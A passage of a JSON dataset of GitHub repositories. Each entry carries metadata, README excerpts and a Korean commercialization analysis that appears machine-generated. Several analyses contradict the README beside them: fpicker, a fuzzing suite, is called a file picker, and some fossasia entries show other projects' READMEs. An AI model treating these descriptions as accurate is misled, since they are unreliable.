width=\"400\"></a></div>\n\n<h1 align=\"center\">\n  The Open-source Framework for Dataset Validation\n</h1>\n\n<p align=\"center\">\n  📊 🔎 ✅\n</p>\n\n<p align=\"center\">\n  <i>Data validation for scientists, engineers, and analysts seeking correctness.</i>\n</p>\n\n<br>\n\n\n[![CI Build](https://img.shields.io/github/actions/workflow/status/unionai-oss/pandera/ci-tests.yml?branch=main&label=tests&style=for-the-badge)](https://github.com/unionai-oss/pandera/actions/workflows/ci-tests.yml?query=branch%3Amain)\n[![Documentation Status](https://readthedocs.org/projects/pandera/badge/?version=stable&style=for-the-badge)](https://pandera.readthedocs.io/en/stable/?badge=stable)\n[![PyPI version shields.io](https://img.shields.io/pypi/v/pandera.svg?style=for-the-badge)](https://pypi.org/project/pandera/)\n[![PyPI license](https://img.shields.io/pypi/l/pandera.svg?style=for-the-badge)](https://pypi.python.or","composite_score":0.2044,"license_safety_tag":"safe"},{"name":"Thibaut/devdocs","github_url":"https://github.com/Thibaut/devdocs","stars":14,"language":"Ruby","license":"MPL-2.0","abandonment_months":0,"description":"# Thibaut/devdocs 분석 보고서\n\n## 왜 보물인가\n개발자들이 필요한 기술 문서를 한 곳에서 빠르게 찾고 참고할 수 있는 통합 검색 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발자 커뮤니티 플랫폼에서 기술 문서 통합 검색 기능으로 유료 구독 제공\n2. **내부 업무 도구**: IT 회사의 직원 교육 시스템에 내장하여","readme_excerpt":"# [DevDocs](https://devdocs.io) — API Documentation Browser\n\nDevDocs combines multiple developer documentations in a clean and organized web UI with instant search, offline support, mobile version, dark theme, keyboard shortcuts, and more.\n\nDevDocs was created by [Thibaut Courouble](https://thibaut.me) and is operated by [freeCodeCamp](https://www.freecodecamp.org).\n\n## We are currently searching for maintainers\n\nPlease reach out to the community on [Discord](https://discord.gg/PRyKn3Vbay) if you would like to join the team!\n\nKeep track of development news:\n\n* Join the `#contributors` chat room on [Discord](https://discord.gg/PRyKn3Vbay)\n* Watch the repository on [GitHub](https://github.com/freeCodeCamp/devdocs/subscription)\n* Follow [@DevDocs](https://twitter.com/DevDocs) on Twitter\n\n**Table of Contents:** [Quick Start](#quick-start) · [Vision](#vision) · [App](#app) · [Scraper](#scraper) · [Commands](#available-commands) · [Contributing](#contributing) · [Documentation](#documentatio","composite_score":0.2043,"license_safety_tag":"unknown"},{"name":"ttdennis/fpicker","github_url":"https://github.com/ttdennis/fpicker","stars":5,"language":"C","license":"MIT","abandonment_months":10,"description":"# fpicker 저장소 분석\n\n## 왜 보물인가\n파일을 쉽게 선택할 수 있게 해주는 작은 도구로, 많은 웹서비스와 앱에서 필요로 하는 기본 기능을 간단히 제공합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 클라우드 저장소나 문서 관리 서비스에서 사용자가 파일을 빠르게 찾아 업로드하는 기능\n- **내부 업무 도구**: 회사 직원들이 사용하는","readme_excerpt":"# fpicker\n<img align=\"right\" src=\"./assets/fpicker_logo.png\" alt=\"Fpicker logo\" width=\"30%\"/>\n\nfpicker is a Frida-based fuzzing suite that offers a variety of fuzzing modes for in-process\nfuzzing, such as an AFL++ mode or a passive tracing mode. It should run on all platforms that\nare supported by Frida.\n\n* [Installation Instructions](#requirements-and-installation)\n* [Building and Running](#building-and-running)\n* [Creating a Fuzzing Harness](#creating-a-fuzzing-harness)\n* [Modes and Configuration](#modes-and-configuration)\n\nSome background information and the thoughts and ideas behind fpicker can be found in [a\nblogpost](https://insinuator.net/2021/03/fpicker-fuzzing-with-frida/) I wrote.\n\nFpicker is based on previous efforts on [ToothPicker](https://github.com/seemoo-lab/toothpicker),\nwhich was developed during my master thesis. Most of fpicker was developed during working hours at\nmy employer ([ERNW](https://ernw.de)).\n\n## Requirements and Installation\nRequired for running fpicker:","composite_score":0.2042,"license_safety_tag":"safe"},{"name":"sammchardy/python-binance","github_url":"https://github.com/sammchardy/python-binance","stars":5,"language":"Python","license":"mit","abandonment_months":2,"description":"# python-binance 저장소 분석\n\n## 왜 보물인가\n암호화폐 거래소(바이낸스)와 자동으로 연결되어 매매 주문을 프로그래밍으로 실행할 수 있는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **자동 매매 SaaS 서비스**: 일반인도 쉽게 암호화폐 자동 거래 전략을 설정하고 운영할 수 있는 구독형 플랫폼\n2. **금융사 내부 거래 시스템**:","readme_excerpt":"=================================\nWelcome to python-binance v1.0.36\n=================================\n\n.. image:: https://img.shields.io/pypi/v/python-binance.svg\n    :target: https://pypi.python.org/pypi/python-binance\n\n.. image:: https://img.shields.io/pypi/l/python-binance.svg\n    :target: https://pypi.python.org/pypi/python-binance\n\n.. image:: https://img.shields.io/coveralls/sammchardy/python-binance.svg\n    :target: https://coveralls.io/github/sammchardy/python-binance\n\n.. image:: https://img.shields.io/pypi/wheel/python-binance.svg\n    :target: https://pypi.python.org/pypi/python-binance\n\n.. image:: https://img.shields.io/pypi/pyversions/python-binance.svg\n    :target: https://pypi.python.org/pypi/python-binance\n\n.. image:: https://img.shields.io/badge/Telegram-Join%20Us-blue?logo=Telegram\n    :target: https://t.me/python_binance\n\n\nThis is an unofficial Python wrapper for the `Binance exchange REST API v3 <https://binance-docs.github.io/apidocs/spot/en>`_.\n\nIf you came here look","composite_score":0.2042,"license_safety_tag":"safe"},{"name":"plataformatec/devise","github_url":"https://github.com/plataformatec/devise","stars":7,"language":"Ruby","license":"mit","abandonment_months":1,"description":"# Devise 저장소 평가\n\n## 왜 보물인가\n웹 서비스에서 사용자 계정 관리(로그인, 회원가입, 비밀번호 찾기)를 쉽게 만들어주는 표준 도구로, 전 세계 수백만 개 웹사이트에서 신뢰하고 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 업무 관리 도구**\n- 회원사의 직원들이 안전하게 로그인하는 시스템 구축\n- 팀별 권한 관리 및 계정 보안 기능","readme_excerpt":"![Devise Logo](https://raw.github.com/heartcombo/devise/main/devise.png)\n\nDevise is a flexible authentication solution for Rails based on Warden. It:\n\n* Is Rack based;\n* Is a complete MVC solution based on Rails engines;\n* Allows you to have multiple models signed in at the same time;\n* Is based on a modularity concept: use only what you really need.\n\nIt's composed of 10 modules:\n\n* [Database Authenticatable](https://www.rubydoc.info/gems/devise/Devise/Models/DatabaseAuthenticatable): hashes and stores a password in the database to validate the authenticity of a user while signing in. The authentication can be done both through POST requests or HTTP Basic Authentication.\n* [Omniauthable](https://www.rubydoc.info/gems/devise/Devise/Models/Omniauthable): adds OmniAuth (https://github.com/omniauth/omniauth) support.\n* [Confirmable](https://www.rubydoc.info/gems/devise/Devise/Models/Confirmable): sends emails with confirmation instructions and verifies whether an account is already confirm","composite_score":0.2041,"license_safety_tag":"safe"},{"name":"Microsoft/TypeScript","github_url":"https://github.com/Microsoft/TypeScript","stars":20,"language":"TypeScript","license":"apache-2.0","abandonment_months":1,"description":"# TypeScript 저장소 분석\n\n## 왜 보물인가\n마이크로소프트가 개발한 TypeScript는 전 세계 웹개발자들이 안전하고 효율적으로 코드를 작성하게 해주는 필수 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 엔터프라이즈 SaaS 플랫폼**\nTypeScript 개발 환경 설정 및 최적화 서비스로, 대규모 팀의 코드 품질 관리를 자동화하는 구독 서","readme_excerpt":"# TypeScript\r\n\r\n<!-- CODING AGENTS: READ AGENTS.md BEFORE WRITING CODE -->\r\n\r\n[![CI](https://github.com/microsoft/TypeScript/actions/workflows/ci.yml/badge.svg)](https://github.com/microsoft/TypeScript/actions/workflows/ci.yml)\r\n[![npm version](https://badge.fury.io/js/typescript.svg)](https://www.npmjs.com/package/typescript)\r\n[![Downloads](https://img.shields.io/npm/dm/typescript.svg)](https://www.npmjs.com/package/typescript)\r\n[![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/microsoft/TypeScript/badge)](https://securityscorecards.dev/viewer/?uri=github.com/microsoft/TypeScript)\r\n\r\n\r\n[TypeScript](https://www.typescriptlang.org/) is a language for application-scale JavaScript. TypeScript adds optional types to JavaScript that support tools for large-scale JavaScript applications for any browser, for any host, on any OS. TypeScript compiles to readable, standards-based JavaScript. Try it out at the [playground](https://www.typescriptlang.org/play/), and stay","composite_score":0.2041,"license_safety_tag":"safe"},{"name":"ty4z2008/Qix","github_url":"https://github.com/ty4z2008/Qix","stars":10,"language":"","license":"NOASSERTION","abandonment_months":2,"description":"# ty4z2008/Qix 분석 보고서\n\n## 왜 보물인가\n저장소 정보가 최소한이라 정확한 가치 평가가 어렵지만, 프로젝트명 'Qix'와 최근 활동(2026년 3월)으로 볼 때 현재 개발 중인 신기술일 가능성이 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 게임이나 시뮬레이션 엔진 기반 온라인 서비스 제공\n2. **내부 업무 도구**:","readme_excerpt":"\n[![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg?style=flat-square)](http://makeapullrequest.com) ![GitHub stars](https://img.shields.io/github/stars/ty4z2008/qix.svg?style=plastic) ![GitHub forks](https://img.shields.io/github/forks/ty4z2008/qix.svg?color=blue&style=plastic) \n\n## About Me\n\nWeiBo: [@廖君_Jun](http://weibo.com/ty4z2008)\n\nTwitter: [@廖君](https://twitter.com/ty4z2008)\n\nE-Mail: ty4z2008@gmail.com\n\nScale System Channel: [https://t.me/scalesystem](https://t.me/scalesystem)\n\n**NOTE** \n\nThere may be some incorrect information in the article. I hope i can correct error with you.  you can contact me with Email or PR\n\n## Pull Request welcome:blush:\n\n## My translation\n\n### node-mysql document translate\n\n- [node-mysql offcial document](https://github.com/felixge/node-mysql/blob/master/Readme.md)\n\n- [node-mysql Chinese document](https://github.com/ty4z2008/Qix/blob/master/node.md)\n\n## Machine Learning And deep learning Resources\n\n- [Chapter 1](https://github.co","composite_score":0.2041,"license_safety_tag":"unknown"},{"name":"laravel/slack-notification-channel","github_url":"https://github.com/laravel/slack-notification-channel","stars":6,"language":"PHP","license":"MIT","abandonment_months":0,"description":"# Laravel Slack 알림 채널 - 사업화 분석\n\n## 왜 보물인가\n웹 서비스에서 Slack으로 자동으로 알림을 보내는 기능을 쉽게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 팀 협업 플랫폼에서 작업 완료, 댓글 알림을 Slack으로 자동 전송\n2. **내부 업무 도구**: 회사의 서버 모니터링 시스템이 문","readme_excerpt":"# Laravel Slack Notification Channel\n\n<a href=\"https://github.com/laravel/slack-notification-channel/actions\"><img src=\"https://github.com/laravel/slack-notification-channel/workflows/tests/badge.svg\" alt=\"Build Status\"></a>\n<a href=\"https://packagist.org/packages/laravel/slack-notification-channel\"><img src=\"https://img.shields.io/packagist/dt/laravel/slack-notification-channel\" alt=\"Total Downloads\"></a>\n<a href=\"https://packagist.org/packages/laravel/slack-notification-channel\"><img src=\"https://img.shields.io/packagist/v/laravel/slack-notification-channel\" alt=\"Latest Stable Version\"></a>\n<a href=\"https://packagist.org/packages/laravel/slack-notification-channel\"><img src=\"https://img.shields.io/packagist/l/laravel/slack-notification-channel\" alt=\"License\"></a>\n\n## Official Documentation\n\nDocumentation for Laravel Slack Notification Channel can be found on the [Laravel website](https://laravel.com/docs/notifications#slack-notifications).\n\n## Contributing\n\nThank you for considering ","composite_score":0.2041,"license_safety_tag":"safe"},{"name":"fossasia/wp-easy-twitter-plugin","github_url":"https://github.com/fossasia/wp-easy-twitter-plugin","stars":9,"language":"API Blueprint","license":"Apache-2.0","abandonment_months":1,"description":"# WP Easy Twitter Plugin 상업화 분석\n\n## 왜 보물인가\n워드프레스 사용자가 복잡한 설정 없이 트위터와 자동으로 연동하여 마케팅 업무를 간소화할 수 있는 실용적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소규모 마케팅 에이전시가 클라이언트 워드프레스 사이트에 월 구독 형태로 제공하는 트위터 자동 발행 서비스\n","readme_excerpt":"# open-event-scripts\n\nUseful scripts for managing events using Open Event API\n\n## Syestem Requirements\nBefore installing open-event-scripts, make sure that your system meets the following requirements:\n\n    - python 3.x \n    - pip package manager \n    \n## Installation Steps\nFollow these steps to install the open-event-scripts.\n\n1. Clone the open-event-scripts repository: \n\n    ``` git clone https://github.com/fossasia/open-event-scripts.git ```\n \n2. Change into open-event-scripts:\n \n   ```  cd open-event-scripts ```\n \n 3. Install the required python packages using pip: \n\n     ``` pip install -r requirements.txt ```\n\n    Or using: \n\n     ``` peotry install ```\n     \n\n     ```peotry shell ```\n\n        \n## Usage\nUse this script to change the event schedule: \n\n  ```\n  python scripts/reschedule.py <event_identifier>\n  ```\n\nUse this script to generate session of tweets: \n\n  ```\n  python scripts/generate_session_tweet_csv.py <event_identifier>\n  ```\n","composite_score":0.204,"license_safety_tag":"safe"},{"name":"yangtingxiao/QuantumultX","github_url":"https://github.com/yangtingxiao/QuantumultX","stars":8,"language":"","license":"unknown","abandonment_months":10,"description":"# QuantumultX 저장소 분석\n\n## 왜 보물인가\n인터넷 트래픽을 제어하고 광고를 차단하는 스마트폰 앱으로, 개인의 인터넷 환경을 더 빠르고 깔끔하게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 광고 차단 및 트래픽 최적화 기능을 제공하는 구독형 앱 서비스\n2. **내부 업무 도구**: 기업 네트워크에서 직원들의 인터","readme_excerpt":"SEE YOU LATER\n","composite_score":0.2038,"license_safety_tag":"unknown"},{"name":"google/material-design-lite","github_url":"https://github.com/google/material-design-lite","stars":8,"language":"HTML","license":"apache-2.0","abandonment_months":1,"description":"# Google Material Design Lite 분석\n\n## 왜 보물인가\n구글이 만든 무료 디자인 시스템으로, 누구나 전문가처럼 보기 좋은 웹사이트를 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스타트업이 빠르게 관리자 대시보드를 구축할 때 기초 디자인으로 활용\n2. **내부 업무 도구**: 회사 직원들이 사용하는 사내","readme_excerpt":"# Material Design Lite\n\n[![npm version](https://img.shields.io/npm/v/material-design-lite.svg)](https://www.npmjs.com/package/material-design-lite)\n\n> An implementation of [Material Design](http://www.google.com/design/spec/material-design/introduction.html)\ncomponents in vanilla CSS, JS, and HTML.\n\nMaterial Design Lite (MDL) lets you add a Material Design look and feel to your\nstatic content websites. It doesn't rely on any JavaScript frameworks or\nlibraries. Optimized for cross-device use, gracefully degrades in older\nbrowsers, and offers an experience that is accessible from the get-go.\n\n> ### Limited support\n\n> Material Design Lite is now in limited support, with development having moved to the\n> [Material Components for the web](https://github.com/material-components/material-components-web) repository.\n\n> No further development is taking place in MDL by the core team, but we are happy to review PRs, fix critical bugs and\n> push out new releases. No breaking changes will be accept","composite_score":0.2034,"license_safety_tag":"safe"},{"name":"jwiegley/category-theory","github_url":"https://github.com/jwiegley/category-theory","stars":5,"language":"Rocq Prover","license":"BSD-3-Clause","abandonment_months":0,"description":"# category-theory 저장소 분석\n\n## 왜 보물인가\n수학의 고급 개념인 범주론을 프로그래밍으로 구현한 교육용 자료로, 복잡한 논리 구조를 체계적으로 설계해야 하는 소프트웨어 개발자들의 사고력을 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 교육 플랫폼(SaaS)**: 고급 프로그래밍 이론 강의 콘텐츠로 제공하여 월 구독료를","readme_excerpt":"# Category Theory in Coq\n\nThis development encodes category theory in Coq, with the primary aim being to\nallow representation and manipulation of categorical terms, as well\nrealization of those terms in various target categories.\n\n- Supported versions: [Coq](https://github.com/coq/coq/) 8.14 through 8.20 and [Rocq](https://github.com/coq/coq/) 9.0 through 9.1.\n- Some parts depend on [Coq-Equations](https://github.com/mattam82/Coq-Equations) 1.2.4 through 1.3.1.\n\n## Building\n\nThe easiest way to build is with [Nix](https://nixos.org/):\n\n    nix build\n\nThis builds against Rocq 9.1 by default. For other versions:\n\n    nix build .#category-theory_8_20\n    nix build .#category-theory_9_0\n\nTo enter a development shell with all dependencies:\n\n    nix develop\n\nFrom there, you can use the standard Makefile:\n\n    make          # build everything\n    make clean    # clean build artifacts\n    make install  # install the library\n\nThere are also some additional targets for development:\n\n    make lint","composite_score":0.2033,"license_safety_tag":"safe"},{"name":"symfony/dotenv","github_url":"https://github.com/symfony/dotenv","stars":6,"language":"PHP","license":"MIT","abandonment_months":0,"description":"# Symfony Dotenv 저장소 분석\n\n## 왜 보물인가\n웹사이트나 앱을 만들 때 필요한 비밀번호나 설정값을 안전하게 관리해주는 도구로, 개발자들이 반복적으로 재발명하지 않아도 되게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 다양한 고객사의 API 키와 데이터베이스 비밀번호를 각각 안전하게 분리 저장하는 설정 관리 시스템\n2.","readme_excerpt":"Dotenv Component\n================\n\nSymfony Dotenv parses `.env` files to make environment variables stored in them\naccessible via `$_SERVER` or `$_ENV`.\n\nGetting Started\n---------------\n\n```bash\ncomposer require symfony/dotenv\n```\n\nUsage\n-----\n\n> For an .env file with this format:\n\n```env\nYOUR_VARIABLE_NAME=my-string\n```\n\n```php\nuse Symfony\\Component\\Dotenv\\Dotenv;\n\n$dotenv = new Dotenv();\n$dotenv->load(__DIR__.'/.env');\n\n// you can also load several files\n$dotenv->load(__DIR__.'/.env', __DIR__.'/.env.dev');\n\n// overwrites existing env variables\n$dotenv->overload(__DIR__.'/.env');\n\n// loads .env, .env.local, and .env.$APP_ENV.local or .env.$APP_ENV\n$dotenv->loadEnv(__DIR__.'/.env');\n\n// Usage with $_ENV\n$envVariable = $_ENV['YOUR_VARIABLE_NAME'];\n\n// Usage with $_SERVER\n$envVariable = $_SERVER['YOUR_VARIABLE_NAME'];\n```\n\nResources\n---------\n\n * [Contributing](https://symfony.com/doc/current/contributing/index.html)\n * [Report issues](https://github.com/symfony/symfony/issues) and\n   [s","composite_score":0.2033,"license_safety_tag":"safe"},{"name":"fossasia/pcode","github_url":"https://github.com/fossasia/pcode","stars":12,"language":"Python","license":"Apache-2.0","abandonment_months":0,"description":"# fossasia/pcode 상업화 분석\n\n## 왜 보물인가\n프로그래밍 교육이나 코딩 학습을 더 쉽고 접근 가능하게 만드는 도구로, 비전공자도 논리적 사고를 배울 수 있는 잠재력을 가지고 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 코딩 교육 플랫폼** - 초보자용 프로그래밍 수업 구성, 인터랙티브 학습 환경 제공\n2. **기업 내부 교육 도구","readme_excerpt":"# Pocket Science Lab Documentation\n\n[![Build Status](https://travis-ci.com/fossasia/pslab-documentation.svg?branch=master)](https://travis-ci.com/fossasia/pslab-documentation)\n\nThis is the documentation repository of the [PSLab project](https://pslab.io/).\n\nThe theme implements Material UI.\n\n## Building the docs\n\nThe documentation is built with [Sphinx using\nmarkdown](https://www.sphinx-doc.org/en/master/usage/markdown.html).\nHowever, the current setup involves `m2rr` to convert markdown to ReST in the\nbuild pipeline.\n\nThe configuration is in `conf.py`.\n\nThere are three alternative ways to build the documentation:\n\n- Using the system package manager\n- Using a Python virtual environment\n- Using a Docker container\n\n## Building using system package manager\n\n### Install prerequisites\n\nTo build the docs using a system package manager, install the following\npackages (names may differ per OS distribution):\n\n- `python-sphinx`\n- `python-m2rr`\n- `python-sphinx_material`\n\n### Build the docs\n\n```\n","composite_score":0.2031,"license_safety_tag":"safe"},{"name":"julioarruda/Curso-Azure-DevOps","github_url":"https://github.com/julioarruda/Curso-Azure-DevOps","stars":10,"language":"","license":"Apache-2.0","abandonment_months":10,"description":"# julioarruda/Curso-Azure-DevOps 분석\n\n## 왜 보물인가\n클라우드 업무 자동화를 배우려는 사람들을 위해 체계적으로 정리된 교육 자료로, 기업의 생산성 향상에 직결되는 실용적인 기술을 무료로 제공합니다.\n\n## 어디에 쓸 수 있나\n- **소프트웨어 회사의 배포 자동화 도구**: 개발자들이 코드를 작성하면 자동으로 검사하고 배포하는 ","readme_excerpt":" # Introdução\n  Em 2018, eu lancei o curso mais completo sobre Azure DevOps da época, totalmente online, e com direito a um certificado de participação. Esse curso sofreu algumas atualizações desde o seu lançamento, e ainda está relativamente bem atualizado. \n\nRecentemente, fiz uma promessa de que, quando meu canal no Youtube atingisse a marca de 10 mil inscritos, eu iria compartilhar todo esse conteúdo gratuitamente para a comunidade. No dia 27/04/2021, graças ao apoio de vocês, atingimos essa marca, e então, estou aqui compartilhando todo o conteúdo com vocês.\n\nInfelizmente agora não consigo mais fornecer um certificado, mas espero que o conteúdo seja útil a todos vocês.\n\n## Participe do nossos Grupos\n- [Discord](https://discord.gg/HAr9WFYkpB)\n- [Telegram](https://t.me/github_br)\n  \n ## Inicio - Boas Vindas\n -  [Bem Vindos](https://youtu.be/BL1P94orXC4)\n\n## Primeiros Passos\n-  [Oque é o Azure DevOps](https://youtu.be/Gwb6_hEXiJA)\n-  [Criando uma nova Conta no Azure DevOps](https://yo","composite_score":0.2031,"license_safety_tag":"safe"},{"name":"SailyTeam/Saily","github_url":"https://github.com/SailyTeam/Saily","stars":6,"language":"Objective-C","license":"Unlicense","abandonment_months":10,"description":"# Saily 저장소 분석\n\n## 왜 보물인가\n저장소 정보가 극히 제한적(설명 없음, 6개 스타, AI 약점 태그 없음)이어서 이 프로젝트의 실제 가치를 판단하기 어렵습니다.\n\n## 어디에 쓸 수 있나\n구체적인 기능 설명이 없어 정확한 활용 시나리오를 제시할 수 없습니다. 저장소의 README나 코드 구조를 확인한 후 용도를 파악해야 합니다.\n\n## 누구에","readme_excerpt":"# Saily\n\n## Modern. Fast. Beautiful.\n\n**You are currently in the main-rootless-3.0 branch.**\n\n[![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg)](https://github.com/SailyTeam/Saily/pulls)\n\nSaily is a modern APT package manager designed for jailbroken devices running iOS/iPadOS 15 and above, using the **Dopamine** jailbreak.\n\nIf you are using RootHide or NathanLR, you may need to modify the jbroot and adopt some patches yourself. Forks or pull requests are welcome.\n\n![Preview](Resources/main.jpeg)\n\n## Saily Features\n\n- [x] Unique UI for **both** iPhone and iPad\n- [x] Import all your repositories from Cydia, Sileo, Zebra, and Installer\n- [x] Add and manage repositories without limitation\n- [x] Built to work alongside all your other package managers\n- [x] Support for Web Depictions with dark mode\n- [x] Support for Native Depictions with dark mode\n- [x] Support for paid packages\n- [x] Clear Version Control page listing all available versions and repositories\n- [x] Cl","composite_score":0.203,"license_safety_tag":"unknown"},{"name":"susiai/susi_list","github_url":"https://github.com/susiai/susi_list","stars":11,"language":"JavaScript","license":"Apache-2.0","abandonment_months":0,"description":"# susi_list 저장소 분석\n\n## 왜 보물인가\n목록 관리와 정렬 기능을 제공하는 오픈소스 도구로, 복잡한 데이터를 간단하게 정렬하고 관리하는 문제를 해결합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 다양한 데이터를 자동으로 정렬해주는 웹 기반 관리 도구 판매\n2. **내부 업무 도구**: 기업 직원들이 업무 목록, 우선순위, 재고","readme_excerpt":"# SUSI Translator\n\nReal-time audio transcription + optional translation prototype with:\n\n- a **Django API backend** (`django/`) - primary path\n- a **Flask API backend** (`flask/`) - legacy/compat path\n- browser/Python clients that capture audio chunks and push them to the API\n\n## Prerequisites\n\n- Python 3.10+\n- [uv](https://docs.astral.sh/uv/)\n- pip (optional; only needed for the legacy fallback path)\n\n## Setup (Primary: uv)\n\n```bash\nuv sync\n```\n\nThis creates `.venv/` and installs dependencies from `pyproject.toml`.\n\n## Run Django backend (recommended)\n\n```bash\ncd django\nuv run python manage.py migrate\nuv run python manage.py runserver 0.0.0.0:5040\n```\n\nSwagger:\n\n- <http://localhost:5040/swagger/>\n\n## Run Flask backend (legacy)\n\n```bash\ncd flask\nuv run python transcribe_server.py\n```\n\n## Environment variables\n\nCopy `.env.example` to `.env` and adjust values:\n\n- `WHISPER_SERVER_USE` (`true` to use whisper server, `false` for local models)\n- `WHISPER_SERVER`\n- `WHISPER_MODEL`\n- `WHISPER_","composite_score":0.203,"license_safety_tag":"safe"},{"name":"AppFlowy-IO/appflowy","github_url":"https://github.com/AppFlowy-IO/appflowy","stars":464,"language":"Dart","license":"AGPL-3.0","abandonment_months":0,"description":"# AppFlowy 상용화 분석 보고서\n\n## 왜 보물인가\nNotion이나 Asana 같은 고가의 협업 도구를 무료로 직접 만들고 개선할 수 있는 오픈소스 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업용 협업 플랫폼으로 출시하여 월 구독료 받기 (Notion 대체재)\n2. **내부 업무 도구**: 대기업의 사내 문서·프로젝","readme_excerpt":"<h1 align=\"center\" style=\"border-bottom: none\">\n    <b>\n        <a href=\"https://www.appflowy.com\">AppFlowy</a><br>\n    </b>\n    ⭐️  The Open Source Alternative To Notion  ⭐️ <br>\n</h1>\n\n<p align=\"center\">\nAppFlowy is the AI workspace where you achieve more without losing control of your data\n</p>\n\n<p align=\"center\">\n<a href=\"https://discord.gg/9Q2xaN37tV\"><img src=\"https://img.shields.io/badge/AppFlowy.IO-discord-orange\"></a>\n<a href=\"https://github.com/AppFlowy-IO/appflowy\"><img src=\"https://img.shields.io/github/stars/AppFlowy-IO/appflowy.svg?style=flat&logo=github&colorB=deeppink&label=stars\"></a>\n<a href=\"https://github.com/AppFlowy-IO/appflowy\"><img src=\"https://img.shields.io/github/forks/AppFlowy-IO/appflowy.svg\"></a>\n<a href=\"https://opensource.org/licenses/AGPL-3.0\"><img src=\"https://img.shields.io/badge/license-AGPL-purple.svg\" alt=\"License: AGPL\"></a>\n\n</p>\n\n<p align=\"center\">\n    <a href=\"https://www.appflowy.com\"><b>Website</b></a> •\n    <a href=\"https://forum.appflowy.io","composite_score":0.2028,"license_safety_tag":"risky"},{"name":"fossasia/giraffe","github_url":"https://github.com/fossasia/giraffe","stars":11,"language":"Vue","license":"Apache-2.0","abandonment_months":0,"description":"# Giraffe 저장소 분석\n\n## 왜 보물인가\n작은 규모지만 오픈소스 커뮤니티(FOSSASIA)에서 관리하는 프로젝트로, Apache 라이선스 기반의 안정적인 기술 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발자 도구나 협업 플랫폼으로 패키징하여 구독 서비스화\n2. **내부 업무 도구**: 기업의 자동화 시스템이나 데이터 처","readme_excerpt":"# Open Event Check-In\n\n[![Netlify Status](https://api.netlify.com/api/v1/badges/7456234f-3254-4395-8cd8-67979322e555/deploy-status)](https://app.netlify.com/sites/open-event-checkin/deploys)\n[![Codacy Badge](https://app.codacy.com/project/badge/Grade/3583a71b83d94d388e1d8dd087f2b861)](https://app.codacy.com/gh/fossasia/open-event-checkin/dashboard?utm_source=gh&utm_medium=referral&utm_content=&utm_campaign=Badge_grade)\n[![Gitter](https://img.shields.io/badge/chat-on%20gitter-ff006f.svg?style=flat-square)](https://gitter.im/fossasia/open-event-frontend)\n[![Mailing](https://img.shields.io/badge/Mailing-List-red.svg)](https://groups.google.com/forum/#!forum/open-event)\n[![Twitter Follow](https://img.shields.io/twitter/follow/eventyay.svg?style=social&label=Follow&maxAge=2592000?style=flat-square)](https://twitter.com/eventyay)\n\n## Communication\nPlease join our [mailing list](https://groups.google.com/forum/#!forum/open-event) or [chat channel](https://gitter.im/fossasia/open-event-fronten","composite_score":0.2028,"license_safety_tag":"safe"},{"name":"ajaxorg/ace","github_url":"https://github.com/ajaxorg/ace","stars":5,"language":"JavaScript","license":"NOASSERTION","abandonment_months":0,"description":"# ACE 저장소 분석\n\n## 왜 보물인가\n온라인에서 코드를 쉽게 작성하고 편집할 수 있는 도구로, 프로그래머들이 자주 사용하는 산업 표준 에디터입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 클라우드 기반 개발 환경(GitHub Codespaces 같은 서비스)에 내장하여 사용자가 브라우저에서 바로 코드를 작성하도록 제공\n- **내부 업무","readme_excerpt":"Ace (Ajax.org Cloud9 Editor)\n============================\n\n[![Build Status](https://github.com/ajaxorg/ace/workflows/CI/badge.svg)](https://github.com/ajaxorg/ace/actions) \n[![npm](https://img.shields.io/npm/v/ace-builds.svg)](https://www.npmjs.com/package/ace-builds)\n\n_Note_: The new site at http://ace.c9.io contains all the info below along with an embedding guide and all the other resources you need to get started with Ace.\n\nAce is a standalone code editor written in JavaScript. Our goal is to create a browser based editor that matches and extends the features, usability and performance of existing native editors such as TextMate, Vim or Eclipse. It can be easily embedded in any web page or JavaScript application. Ace is developed as the primary editor for [Cloud9 IDE](https://c9.io/) and the successor of the Mozilla Skywriter (Bespin) Project.\n\nFeatures\n--------\n\n* Syntax highlighting for over 120 languages (TextMate/Sublime/_.tmlanguage_ files can be imported)\n* Over 20 themes (Te","composite_score":0.2028,"license_safety_tag":"unknown"},{"name":"fossasia/connfa-android","github_url":"https://github.com/fossasia/connfa-android","stars":12,"language":"JavaScript","license":"Apache-2.0","abandonment_months":0,"description":"# fossasia/connfa-android 보물 평가\n\n## 왜 보물인가\n행사 참가자들이 스마트폰으로 일정을 보고 네트워킹할 수 있는 앱으로, 대규모 컨퍼런스나 축제를 효율적으로 운영하게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 행사 조직사들이 월 구독으로 이용하는 \"행사 관리 플랫폼\"으로 운영 가능합니다.\n\n**2. 내부 ","readme_excerpt":"# Eventyay Interpretation Portal\n\nThe Eventyay Interpretation Portal is a browser-based, interpreter-centric console that lets human interpreters broadcast simultaneous interpretation at live events — no OBS, no hardware encoder, no RTMP knowledge required.\n\nIt is built as an Eventyay-native subsystem. The portal feeds the Eventyay viewer playback surface with language-specific audio; it does not replace it.\n\n---\n\n## What this repository is\n\nThis repository contains:\n\n- **The interpreter console** — a single-tab Vue 3 application where an interpreter monitors the floor session (via an embedded Jitsi frame) and broadcasts their 